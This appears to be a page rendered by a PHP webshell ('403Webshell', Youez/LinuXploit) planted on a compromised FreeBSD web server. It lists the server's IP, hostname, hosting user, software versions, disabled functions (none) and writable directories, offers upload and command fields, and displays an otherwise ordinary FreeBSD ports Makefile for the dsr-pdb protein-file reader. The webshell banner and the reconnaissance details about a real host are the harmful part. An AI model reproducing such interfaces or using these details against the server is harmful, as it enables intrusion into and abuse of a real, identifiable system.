403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.89
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/biology/dsr-pdb/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/biology/dsr-pdb/Makefile
PORTNAME=	dsr-pdb
DISTVERSION=	1.0.3
PORTREVISION=	8
CATEGORIES=	biology
MASTER_SITES=	https://graphics.stanford.edu/~drussel/
DISTNAME=	${PORTNAME}
DIST_SUBDIR=	${PORTNAME}-${DISTVERSION}

MAINTAINER=	yuri@FreeBSD.org
COMMENT=	Simple C++ PDB reader (reads the protein description format)
WWW=		https://graphics.stanford.edu/~drussel/pdb/

LICENSE=	LGPL21
LICENSE_FILE=	${WRKSRC}/COPYING.txt

BROKEN_aarch64=	ld: error: undefined symbol: .mcount (see bug#262709)

LIB_DEPENDS=	libboost_program_options.so:devel/boost-libs

USES=		compiler:c++11-lang gmake libtool localbase:ldflags tar:tgz
USE_LDCONFIG=	yes

GNU_CONFIGURE=	yes

WRKSRC=		${WRKDIR}/${PORTNAME}-${PORTVERSION}
CXXFLAGS+=	-fPIC --std=c++11 # libboost_program_options.so isn't found without --std=c++11

post-patch:
.for dir in lib tools test
	@cd ${WRKSRC}/${dir} && ${LN} -s ../ dsrpdb
.endfor

post-build: # the project itself doesn't support shared libraries in a regular way
	@cd ${WRKSRC}/lib && ${CXX} ${LDFLAGS} --shared -Wl,-soname,libdsrpdb.so -o libdsrpdb.so *.o

post-install:
	${INSTALL_DATA} ${WRKSRC}/config.h ${STAGEDIR}${PREFIX}/include/dsrpdb
	${INSTALL_LIB} ${WRKSRC}/lib/libdsrpdb.so ${STAGEDIR}${PREFIX}/lib

.include <bsd.port.mk>

Youez - 2016 - github.com/yon3zu
LinuXploit